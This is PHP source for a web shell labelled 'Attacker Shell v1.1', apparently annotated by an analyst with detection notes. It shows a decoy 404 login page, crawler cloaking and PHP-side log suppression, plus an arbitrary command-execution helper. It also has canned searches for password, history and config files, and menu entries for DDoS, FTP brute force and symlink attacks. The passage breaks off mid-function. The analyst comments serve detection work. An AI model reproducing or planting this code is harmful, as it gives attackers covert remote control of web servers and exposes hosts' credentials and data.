Uscite del 4 luglio 2015



<?php
               
// Analyst note: hard-coded credential. The access gate further down compares it with
// md5() of the POSTed "pass" field, so this value is an unsalted MD5 digest.
$auth_pass = "9df3ca2dae1d9aee80928d4cf404e8e4";
$default_action = 'Expl';
@define('SELF_PATH', __FILE__);
// Crawler cloaking: a request whose User-Agent contains "Google" never reaches the login
// form. The branch calls arHeader() (the page-header renderer defined later in this file)
// with a 404 status string and exits. Responses that differ by User-Agent are a triage hint.
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
    arHeader('HTTP/1.0 404 Not Found');
    exit;
}
@session_start();
// Anti-forensics at the PHP layer: error reporting and PHP error logging are switched off
// and the execution time limit is removed for this request. These are PHP runtime settings
// only; nothing here touches the web server's own request logging.
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
// set_magic_quotes_runtime() was removed in PHP 7.0, which dates this sample to PHP 5-era hosts.
@set_magic_quotes_runtime(0);
// Fixed banner string; usable as a static file-content signature.
@define('TITLE', 'Attacker Shell v1.1');

// When magic quotes are active, undo the automatic escaping so POSTed and cookie values
// reach the rest of the script exactly as the client sent them.
// get_magic_quotes_gpc() is another PHP 5-era API (removed in PHP 8.0).
if(get_magic_quotes_gpc()) {
// Recursively applies stripslashes() to a string or to every element of a nested array.
function ARstripslashes($array) {
return is_array($array) ? array_map('ARstripslashes', $array) : stripslashes($array);
}
$_POST = ARstripslashes($_POST);
    $_COOKIE = ARstripslashes($_COOKIE);
}

/**
 * Prints a decoy page that imitates an Apache "Not Found" error and then terminates the request.
 *
 * The markup contains a POST form with one password input named "pass"; the inline style
 * gives the input a white background and white border.
 *
 * Analyst notes:
 *  - No header() call is made here, so the "Not Found" text is body content only; the HTTP
 *    status is whatever the server would otherwise send (presumably 200 - confirm against logs).
 *  - A page with this body text plus a <form method=post> holding a single "pass" field is a
 *    practical content signature for the login stage.
 *  - The Host request header is echoed into the page without escaping.
 */
function arLogin() {
  echo "<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
";
echo '<address> Apache Server at '. $_SERVER['HTTP_HOST']. ' Port 80</address>';
  echo"  <style>
        input { margin:0;background-color:#fff;border:1px solid #fff; }
    </style>
    <center>
    <form method=post>
    <input type=password name=pass>
    </form></center>
";
exit;
}


/**
 * Stores a cookie both in the current request's $_COOKIE array and in the response.
 *
 * Writing $_COOKIE directly makes the value visible to code that runs later in the same
 * request. setcookie() is called with name and value only, so no expiry, path, domain or
 * flag arguments are supplied.
 *
 * @param string $k Cookie name.
 * @param string $v Cookie value.
 */
function ARsetcookie($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}

// Access gate. A POSTed "pass" whose md5() equals $auth_pass sets a cookie named
// md5(Host header) whose value is $auth_pass itself. Any request without that cookie
// name/value pair is sent to arLogin(), which prints the decoy page and exits.
// Analyst notes: the cookie name is a 32-hex-character MD5 of the requested host name, and
// the login request is a POST to this file carrying a "pass" field. Both are request
// artefacts worth searching for in proxy or WAF captures.
if(!empty($auth_pass)) {
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
        ARsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
        arLogin();
}

// Platform switch used by the rest of the script: 'win' when PHP_OS starts with "win"
// (case-insensitive), otherwise 'nix'.
if(strtolower(substr(PHP_OS,0,3)) == "win")
$os = 'win';
else
$os = 'nix';

// Reads the PHP hardening settings that the console later displays.
$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
    error_reporting(0);

$disable_functions = @ini_get('disable_functions');
// $home_cwd keeps the directory the script started in. The working directory is then
// switched to the client-supplied POST field "c" with no validation.
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
// Normalise Windows path separators and make sure $cwd ends with a slash.
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';

// Defaults the per-host "ajax" cookie entry for this request.
// NOTE(review): $default_use_ajax is not assigned anywhere in the visible part of the file.
if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
    $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;

// Label => command table of canned host-reconnaissance commands, one set per platform.
// The entries cover directory listings, listening ports, processes and accounts, plus
// searches for setuid/setgid files, world-writable paths, configuration files, password
// files and shell or database history files. The table is not consumed in the visible part
// of the file.
// Analyst note: these command lines, run by the web-server account, are good candidates for
// process-audit (auditd/EDR) hunting rules.
if($os == 'win')
$aliases = array("List Directory" => "dir","Find index.php in current dir" => "dir /s /w /b index.php","Find *config*.php in current dir" => "dir /s /w /b *config*.php","Show active connections" => "netstat -an","Show running services" => "net start","User accounts" => "net user","Show computers" => "net view","ARP Table" => "arp -a","IP Configuration" => "ipconfig /all");
else
$aliases = array("List dir" => "ls -lha","list file attributes on a Linux second extended file system" => "lsattr -va","show opened ports" => "netstat -an | grep -i listen","process status" => "ps aux","Find" => "","find all suid files" => "find / -type f -perm -04000 -ls","find suid files in current dir" => "find . -type f -perm -04000 -ls","find all sgid files" => "find / -type f -perm -02000 -ls","find sgid files in current dir" => "find . -type f -perm -02000 -ls","find config.inc.php files" => "find / -type f -name config.inc.php","find config* files" => "find / -type f -name \"config*\"","find config* files in current dir" => "find . -type f -name \"config*\"","find all writable folders and files" => "find / -perm -2 -ls","find all writable folders and files in current dir" => "find . -perm -2 -ls","find all service.pwd files" => "find / -type f -name service.pwd","find service.pwd files in current dir" => "find . -type f -name service.pwd","find all .htpasswd files" => "find / -type f -name .htpasswd","find .htpasswd files in current dir" => "find . -type f -name .htpasswd","find all .bash_history files" => "find / -type f -name .bash_history","find .bash_history files in current dir" => "find . -type f -name .bash_history","find all .fetchmailrc files" => "find / -type f -name .fetchmailrc","find .fetchmailrc files in current dir" => "find . 
-type f -name .fetchmailrc","Locate" => "","locate httpd.conf files" => "locate httpd.conf","locate vhosts.conf files" => "locate vhosts.conf","locate proftpd.conf files" => "locate proftpd.conf","locate psybnc.conf files" => "locate psybnc.conf","locate my.conf files" => "locate my.conf","locate admin.php files" =>"locate admin.php","locate cfg.php files" => "locate cfg.php","locate conf.php files" => "locate conf.php","locate config.dat files" => "locate config.dat","locate config.php files" => "locate config.php","locate config.inc files" => "locate config.inc","locate config.inc.php" => "locate config.inc.php","locate config.default.php files" => "locate config.default.php","locate config* files " => "locate config","locate .conf files"=>"locate '.conf'","locate .pwd files" => "locate '.pwd'","locate .sql files" => "locate '.sql'","locate .htpasswd files" => "locate '.htpasswd'","locate .bash_history files" => "locate '.bash_history'","locate .mysql_history files" => "locate '.mysql_history'","locate .fetchmailrc files" => "locate '.fetchmailrc'","locate backup files" => "locate backup","locate dump files" => "locate dump","locate priv files" => "locate priv");

/**
 * Emits the operator console page header: HTML head with inline CSS, the client-side
 * JavaScript helpers, a hidden POST form named "mf", a host-information banner, the action
 * menu and the quick execute / change-dir / make-dir / make-file forms.
 *
 * Declares no parameters. Reads $_POST, $_SERVER and the globals cwd, home_cwd, os,
 * safe_mode, default_charset and color; everything is written straight to the response.
 *
 * Analyst notes (detection and triage):
 *  - Every console action is a POST back to this same file carrying the form fields
 *    a, c, p1, p2, p3 and charset ("a" appears to select the action, "c" the directory);
 *    the asynchronous path adds ajax=true. That field set is a usable request-body signature.
 *  - The asynchronous response handler passes part of the server response to the browser's
 *    eval().
 *  - Static strings such as the TITLE constant, "Attacker Shell" and the menu action names
 *    (Expl, Exec, Eval, SafeMode, symlink, Mass, DDos, Sql, FTPB, String, Network, Sec,
 *    Zoneh, About, Logout, Remove) are candidates for file-content signatures.
 */
function arHeader() {
if(empty($_POST['charset']))
$_POST['charset'] = $GLOBALS['default_charset'];
global $color;
if(!$color) $color = 'white';

// $_POST['charset'] is written into the <meta> tag below without escaping.
// NOTE(review): default_charset is not assigned in the visible part of the file.
echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . TITLE ."</title>
<style type='text/css'>
 input[type=submit], input[type=button], input[type=reset]{
text-align:center;
background:repeat-x center bottom #141414;
border:1px solid #393939;
color:#fff;
border-top-color:#393939;
padding:4px 4px;
margin:2px 3px;
height:16px;
-moz-box-shadow:0 0 1px black;
-webkit-box-shadow:0 0 1px black;
box-shadow:0 0 1px black;
text-shadow:0 1px black;
-moz-border-radius:6px;
-webkit-border-radius:9px;
-khtml-border-radius:4px;
border-radius:9px;
height:23px;
}

input[type=submit]:hover , input[type=button]:hover, input[type=reset]:hover{
background-position:center top;
text-decoration:none;
}
input[type=text], input[type=password]{
outline:none;
    transition: all 0.20s ease-in-out;
    -webkit-transition: all 0.20s ease-in-out;
    -moz-transition: all 0.20s ease-in-out;
    border:1px solid rgba(0,0,0, 0.2);
    background:#111111;
    border:0;
    padding:2px;
    border-bottom:1px solid #393939;
    font-size:11px;
    color:#ffffff;
    -moz-border-radius: 6px;
    border-radius: 9px;
    border:1px solid #4C83AF;
    margin:4px 0 8px 0;
}
input[type=text]{
    background:#111111;
    color:#0F0;
    margin:0 4px;
    border:1px solid #555555;
}
input[type=submit]:hover ,input[type=text]:hover{
    background:#222222;
    border-left:1px solid #4C83AF;
    border-right:1px solid #4C83AF;
    border-bottom:1px solid #4C83AF;
    border-top:1px solid #4C83AF;
}
input:focus, textarea:focus {
    outline: 0;
    border-color: rgba(82, 168, 236, 0.8);
    -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
    -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
    box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
    background:#191919;';
    overflow: auto;
}
*{
    text-shadow: 0pt 0pt 0.3em rgb(153, 153, 153);
    font-size:11px;
    font-family:Tahoma,Verdana,Arial;
}
body{
    background:#010101;
    color:#fff;
}
body,td,th{
    font: 9pt Lucida,Verdana;
    margin:0;vertical-align:top;
    color:#fff;
}
table.info{
    color:#fff;
    background-color:#010101;
}
span,h1,a{
    color: $color !important;
}
span{
    font-weight: bolder;
}
div.content{
    height: auto;
    width: auto;
    border: 2px solid #333;
    color: #999;
    font-size: 12px;
    font-family: Verdana, Geneva, sans-serif;
    background-color: #000;
}
a {
    text-decoration:none;
    color: rgba(35,96,156,1.5) !important;
}
a:hover{
    border-bottom:1px solid #4C83AF;
}
.ml1{
    border:1px solid #000;
    padding:5px;margin:0;
    overflow: auto;
}
.bigarea{
    width:100%;
    height:300px;
}
input,textarea,select{
    margin:0;
    color:#fff;
    background-color:#141414;
}
select{
    background:#111111;
    color:#0F0;
    margin:0 4px;
    border:1px solid #555555;
}
textarea{
    background:#111111;
    color:#0F0;
    margin:0 4px;
    border:1px solid #555555;
}
#menu{
    font-family:orbitron;
    background: #111111;
    margin:5px 2px 4px 2px;
}
#menu ul {
    margin:0;
    padding:0;
    float:left;
    -moz-border-radius: 6px;
    border-radius: 9px;
    border:1px solid #555555;
}
#menu li {
    position:relative;
    display:block;
    float:left;
}
#menu a{
    display:block;
    float:left;
    font-family:orbitron;
    padding:4px 6px;
    margin:0;
    text-decoration:none;
    letter-spacing:1px;
    color:white;
}
#menu a:hover{
    background:rgba(35,96,156,0.2);
    font-family:orbitron;
    border-bottom:0px;
}
#menu li:hover>ul a:hover{
    width:127;
    background:rgba(35,96,156,0.2);
}
#menu li:hover>ul{
    left:0px;
    border-left:1px solid white;
}
#menu ul ul{
    position:absolute;
    top:18px;left:-990em;
    width:140px;
    padding:5px 0 5px 0;
    background:black;
    margin-top:2px;
}
form{
    margin:0px;
}
#toolsTbl{
    text-align:center;
}
h1{
    border-left:0px solid $color;
    padding: 0px;
    font: 13pt Verdana;
    background-color:#auto;
}
.main th{
    text-align:left;
    background:#191919;
    border-bottom:0px solid #333333;
    font-weight:normal;
}
.main tr:hover{
    background:rgba(35,96,156,0.2);
}

</style>
<script>
    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
    var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
    var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
    var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
    var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
    var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
    var d = document;
function set(a,c,p1,p2,p3,charset) {
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
d.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = 'ajax=true';
for(i=0;i<d.mf.elements.length;i++)
params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
}
function sr(url, params) {
if (window.XMLHttpRequest)
req = new XMLHttpRequest();
else if (window.ActiveXObject)
req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
            req.send(params);
        }
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
} else alert('Request error!');
}

</script>
<head><body><div style='position:absolute;width:100%;background-color:#000;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
// Host reconnaissance for the banner: disk usage of the current directory plus kernel
// name and release as reported by php_uname().
$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
// Avoids a division by zero in the percentage shown in the banner.
$totalSpace = $totalSpace?$totalSpace:1;
$release = @php_uname('r');
$kernel = @php_uname('s');
// Outbound links placed in the banner and menu: an exploit-db.com search built from the
// kernel name and release, and a Bing "ip:" search for the server address.
// NOTE(review): strpos('Linux', $kernel) looks for $kernel inside the literal 'Linux';
// the haystack and needle are in that order here.
$explink = 'http://exploit-db.com/search/?action=search&filter_description=';
    $bing = 'http://www.bing.com/search?q=ip:'. @$_SERVER["SERVER_ADDR"] ;
if(strpos('Linux', $kernel) !== false)
$explink .= urlencode('Linux Kernel ' . substr($release,0,6));
else
$explink .= urlencode($kernel . ' ' . substr($release,0,3));
// Identity of the account PHP runs as: POSIX effective uid/gid when the extension is
// available, otherwise the script owner's values from get_current_user()/getmyuid()/getmygid().
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}

// Breadcrumb for the working directory: one link per path component, each calling
// g("Expl", <path up to that component>).
$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n=count($path);
for($i=0; $i<$n-1; $i++) {
$cwd_links .= "<a href='#' onclick='g(\"Expl\",\"";
for($j=0; $j<=$i; $j++)
$cwd_links .= $path[$j].'/';
$cwd_links .= "\")'>".$path[$i]."/</a>";
}

// <option> list of charsets. $opt_charsets is built here but is not used in the visible
// part of this function.
$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
$opt_charsets = '';
foreach($charsets as $item)
$opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';

// On Windows, probes drive letters c through z and links every one that exists.
$drives = "";
if($GLOBALS['os'] == 'win') {
foreach(range('c','z') as $drive)
if(is_dir($drive.':\\'))
$drives .= '<a href="#" onclick="g(\'Expl\',\''.$drive.':/\')"><span>|</span> '.$drive.'<span> |</span></a> ';
}
    // Capability flags shown in the banner: client libraries detected via function_exists()
    // and the PHP path-restriction settings (open_basedir, safe_mode_exec_dir, safe_mode_include_dir).
    $on   = "<font color=#0F0> ON </font>";
    $of   = "<font color=red> OFF </font>";
    $none = "<font color=#0F0> NONE </font>";
    if(function_exists('curl_version'))
      $curl = $on;
    else
      $curl = $of;
    if(function_exists('mysql_get_client_info'))
       $mysql = $on;
    else
       $mysql = $of;
    if(function_exists('mssql_connect'))
      $mssql = $on;
    else
      $mssql = $of;
    if(function_exists('pg_connect'))
      $pg = $on;
    else
      $pg = $of;
    if(function_exists('oci_connect'))
      $or = $on;
    else
      $or = $of;
    if(@ini_get('open_basedir'))
      $open_b = @ini_get('open_basedir');
    else
      $open_b = $none;
    if(@ini_get('safe_mode_exec_dir'))
      $safe_exe = @ini_get('safe_mode_exec_dir');
    else
      $safe_exe = $none;
    if(@ini_get('safe_mode_include_dir'))
      $safe_include = @ini_get('safe_mode_include_dir');
    else
      $safe_include = $none;

    // Banner and action menu. All values (uname, account, server software, addresses, ini
    // settings) are concatenated into the HTML as-is.
    echo '<table class=info cellpadding=3 cellspacing=0 width=100%>'
       . '<td><nobr>'. '<span>Uname -a: </span>' . substr(@php_uname(), 0, 120)
       . '&nbsp;<a href="' . $explink . '" target=_blank>|exploit-db.com|</a></nobr><br>
          <span>User: </span>' . $uid . ' ( ' . $user . ' ) <br>
          <span>Group: </span> ' . $gid . ' ( ' . $group . ' )<br>
          <span>Server: </span>'.@getenv('SERVER_SOFTWARE').'<br>
          <span><font color="Red">Server IP: </font></span>' . @$_SERVER["SERVER_ADDR"] . '&nbsp;|&nbsp;<span><font color="Red">Your IP: </font></span>' . $_SERVER['REMOTE_ADDR'] . '<br>
          <span>Safe Mode: </span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON (Secure)</font>':'<font color=green><b>OFF (Not Secure)</b></font>')
       . '<br><span>PHP Version: </span>' . @phpversion() . '&nbsp;<a href=# onclick="g(\'Eval\',null,\'\',\'info\')">|phpinfo|</a><br>
          <span>Date & Time: </span> ' . date('Y-m-d H:i:s')
       . '<br><Span>HDD: </Span>' . arViewSize($totalSpace)
       . '<br><span>Free: </span> ' . arViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>
          <span>cURL:'. $curl.'  MySQL:'.$mysql.'  MSSQL:'.$mssql.'  PostgreSQL:'.$pg.'  Oracle:'.$or.' </span><br>
          <span>Open_basedir:'.$open_b.' Safe_mode_exec_dir:'.$safe_exe.'   Safe_mode_include_dir:'.$safe_include.'</span><br>
          <span>Detected drives: </span>' . $drives . ' ~~>
          <span>PWD: </span>' . $cwd_links . ' '. arPermsColor($GLOBALS['cwd']) . '&nbsp;<a href=# onclick="g(\'Expl\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><font color="Red">|HMOE|</font></a></td>'
       . '<td width=1 align=right><nobr><h2 style="font-size:40px; color:rgba(35,96,156,0.3) ">Attacker Shell</h2></nobr></td></tr></table>'
       . '<div id="menu"><ul class="menu">

          <li><a href="#" onclick="g(\'Expl\',null,\'\',\'\',\'\')">EXPLOITER</a></li>
          <li><a href="#" onclick="g(\'Exec\',null,\'\',\'\',\'\')">SHELL</a></li>
          <li><a href="#" onclick="g(\'Eval\',null,\'\',\'\',\'\')">EVAL</a></li>
          <li><a href="#" onclick="g(\'SafeMode\',null,\'\',\'\',\'\')">SAFE MODE</a></li>
          <li><a>SYMLINK</a><ul>
          <li><a href=# onclick="g(\'symlink\',null,\'website\',null)">Domains</a></li>
          <li><a href=# onclick="g(\'symlink\',null,null,\'whole\')">Whole Server Symlink</a></li>
          <li><a href=# onclick="g(\'symlink\',null,null,null,\'config\')">Config PHP symlink</a></li></ul></li>
          <li><a href="#" onclick="g(\'Mass\',null,\'\',\'\',\'\')">MASS</a></li>
          <li><a href="#" onclick="g(\'DDos\',null,\'\',\'\',\'\')">DDOS</a></li>
          <li><a href="#" onclick="g(\'Sql\',null,\'\',\'\',\'\')">SQL</a></li>
          <li><a href="#" onclick="g(\'FTPB\',null,\'\',\'\',\'\')">FTP BRUTE</a></li>
          <li><a href="#" onclick="g(\'String\',null,\'\',\'\',\'\')">HASH</a></li>
          <li><a href="#" onclick="g(\'Network\',null,\'\',\'\',\'\')">NETWORK</a></li>
          <li><a href="#" onclick="g(\'Sec\',null,\'\',\'\',\'\')">SEC INFO</a></li>
          <li><a href="#" onclick="g(\'Zoneh\',null,\'\',\'\',\'\')">ZONE-H</a></li>
          <li><a href="' . $bing . '"target=_blank>BING</a></li>
          <li><a href="#" onclick="g(\'About\',null,\'\',\'\',\'\')">ABOUT</a></li>
          <li><a href="#" onclick="g(\'Logout\',null,\'\',\'\',\'\')">LOGOUT</a></li>
          <li><a href="#" onclick="g(\'Remove\',null,\'\',\'\',\'\')">KIll CODE</a></li>
          </ul></div>';

  // Quick-action forms (execute, change dir, make dir, make file); each submits through g().
  // NOTE(review): $is_writable is not defined anywhere in this function, so it interpolates
  // as an empty string.
  echo "<table class=info cellpadding=3 cellspacing=0 align=left width=100%'>
          <td><form onsubmit=\"g('Exec',null,this.c.value);return false;\"><span>Execute:</span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input class='toolsInp' type=text name=c value='' style='width:55%;'><input type=submit value='Execute' style='width:12%;'></form>
          <form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span>&nbsp;&nbsp;<input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."' style='width:55%;'><input type=submit value='Change' style='width:12%;'></form>
          </td><td>
          <form onsubmit=\"g('Expl',null,'mkdir',this.d.value);return false;\"><span>Make dir: </span>$is_writable<input class='toolsInp' type=text name=d style='width:55%;'><input type=submit value='Make' style='width:12%;'></form>
 <form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<input class='toolsInp' type=text name=f style='width:55%;'><input type=submit value='Make' style='width:12%;'></form>
          </td>
          </table>";
}

// Fallback stubs: when the POSIX functions are absent and not named in disable_functions,
// define replacements that always return false, so later calls to posix_getpwuid() and
// posix_getgrgid() do not fail on hosts without the POSIX extension.
if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) {
    function posix_getpwuid($p) {return false;} }
if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) {
    function posix_getgrgid($p) {return false;} }

/**
 * Runs an operating-system command and returns its output as a string.
 *
 * Uses the first available of exec(), passthru(), system(), shell_exec() and popen(),
 * in that order; output buffering captures what passthru() and system() print. Warnings
 * are suppressed with @ on most calls. Returns '' when none of the five paths is taken.
 *
 * Analyst notes:
 *  - $in is handed to the shell unchanged; callers in this file pass both fixed strings
 *    and request-derived values.
 *  - These five functions are the only execution paths in this helper, so a php.ini
 *    disable_functions list covering all of them closes it, and child processes of the
 *    web-server/PHP worker are the place to look for its activity.
 *
 * @param string $in Command line to run.
 * @return string|null Command output (shell_exec() may yield null).
 */
function arEx($in) {
$out = '';
if (function_exists('exec')) {
// exec() fills $out with one array element per output line; rejoin with newlines.
@exec($in,$out);
$out = @join("\n",$out);
} elseif (function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
} elseif (is_resource($f = @popen($in,"r"))) {
// Last resort: read the process pipe in 1024-byte chunks until EOF.
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}

/**
 * Formats a byte count for display.
 *
 * Values of at least 1024 are scaled to the largest fitting binary unit (KB, MB or GB)
 * and printed with two decimals; smaller values are returned unscaled with a " B" suffix.
 *
 * @param int|float $s Size in bytes.
 * @return string Human-readable size such as "1.50 KB" or "512 B".
 */
function arViewSize($s) {
    // Largest unit first so the first threshold that fits wins.
    $units = array(
        ' GB' => 1073741824,
        ' MB' => 1048576,
        ' KB' => 1024,
    );
    foreach ($units as $suffix => $divisor) {
        if ($s >= $divisor) {
            return sprintf('%1.2f', $s / $divisor) . $suffix;
        }
    }
    return $s . ' B';
}

function arPerms($p) {
    if (($p & 0xC000) == 0xC000)$i = 's';
elseif (($p & 0xA000) == 0xA000)$i = 'l';
elseif (($p & 0x8000) == 0x8000)$i = '-';
elseif (($p & 0x6000) == 0x6000)$i = 'b';
elseif (($p & 0x4000) == 0x4000)$i = 'd';
elseif (($p & 0x2000) == 0x2000)$i = 'c';
elseif (($p & 0x1000) == 0x1000)$i = 'p';
else $i = 'u';
$i .= (($p & 0x0100) ? 'r' : '-');
$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
return $i;
}

/**
 * Returns the arPerms() mode string of a path wrapped in a coloured <font> tag.
 *
 * Red (#FF0000) when the path is not readable by the PHP process, white when it is
 * readable but not writable, green (#25ff00) when it is both.
 *
 * @param string $f Path to inspect.
 * @return string HTML fragment.
 */
function arPermsColor($f) {
    if (!@is_readable($f)) {
        $open = '<font color=#FF0000>';
    } elseif (!@is_writable($f)) {
        $open = '<font color=white>';
    } else {
        $open = '<font color=#25ff00>';
    }
    return $open . arPerms(@fileperms($f)) . '</font>';
}

/**
 * Lists the entries of a directory.
 *
 * Delegates to scandir() when it exists; otherwise walks the directory with
 * opendir()/readdir() and collects the names in read order.
 *
 * NOTE(review): in the fallback path $files is never initialised and the handle from
 * opendir() is neither checked nor closed.
 *
 * @param string $dir Directory path.
 * @return array|false Entry names, including "." and "..".
 */
function arScandir($dir) {
    if(function_exists("scandir")) {
        return scandir($dir);
    } else {
        $dh  = opendir($dir);
        while (false !== ($filename = readdir($dh)))
            $files[] = $filename;
        return $files;
    }
}

/**
 * Looks up a program on the host by running "which <name>" through arEx().
 *
 * Analyst note: each call spawns a "which" process under the PHP worker account; $p is
 * concatenated into the command line unquoted (the callers visible in this file pass
 * fixed names only).
 *
 * @param string $p Program name.
 * @return string|false Output of "which" when non-empty, otherwise false.
 */
function arWhich($p) {
$path = arEx('which ' . $p);
if(!empty($path))
return $path;
return false;
}

/**
 * "Server security information" page: prints an inventory of the host's software,
 * PHP restrictions, readable credential files, installed tools and local accounts.
 *
 * Output is wrapped by arHeader() and arFooter() (arFooter() is not defined in the visible
 * part of the file). All values are echoed into the HTML as-is.
 *
 * Analyst notes (what this page leaves behind on the host):
 *  - On non-Windows hosts with safe_mode off it runs one "which <name>" per entry of the
 *    three tool lists below, then "df -h"; on Windows it runs "ver", "net accounts" and
 *    "net user". A burst of these commands from the web-server account is a strong
 *    process-audit indicator.
 *  - The $danger list names host security tooling (antivirus, rootkit checkers, firewalls,
 *    IDS, log monitors); the page reports which of them are installed.
 *  - It tests whether /etc/passwd and /etc/shadow are readable by the PHP process and reads
 *    /proc/version, /etc/issue.net and /etc/hosts.
 *  - When POST fields p2 and p3 are numeric it walks that UID range with posix_getpwuid()
 *    and prints every account record found.
 */
function actionSec() {
arHeader();
echo '<h1>Server security information</h1><div class=content>';
// Nested helper, declared when actionSec() runs: prints "name: value" for a non-empty
// value, using a <pre> block when the value spans several lines.
function arSecParam($n, $v) {
$v = trim($v);
if($v) {
echo '<span>' . $n . ': </span>';
if(strpos($v, "\n") === false)
echo $v . '<br>';
else
echo '<pre class=ml1>' . $v . '</pre>';
}
}

// Web server and PHP configuration inventory.
arSecParam('Server software', @getenv('SERVER_SOFTWARE'));
    if(function_exists('apache_get_modules'))
        arSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
arSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
arSecParam('Open base dir', @ini_get('open_basedir'));
arSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
arSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
arSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
// Database client libraries available to PHP.
$temp=array();
if(function_exists('mysql_get_client_info'))
$temp[] = "MySql (".mysql_get_client_info().")";
if(function_exists('mssql_connect'))
$temp[] = "MSSQL";
if(function_exists('pg_connect'))
$temp[] = "PostgreSQL";
if(function_exists('oci_connect'))
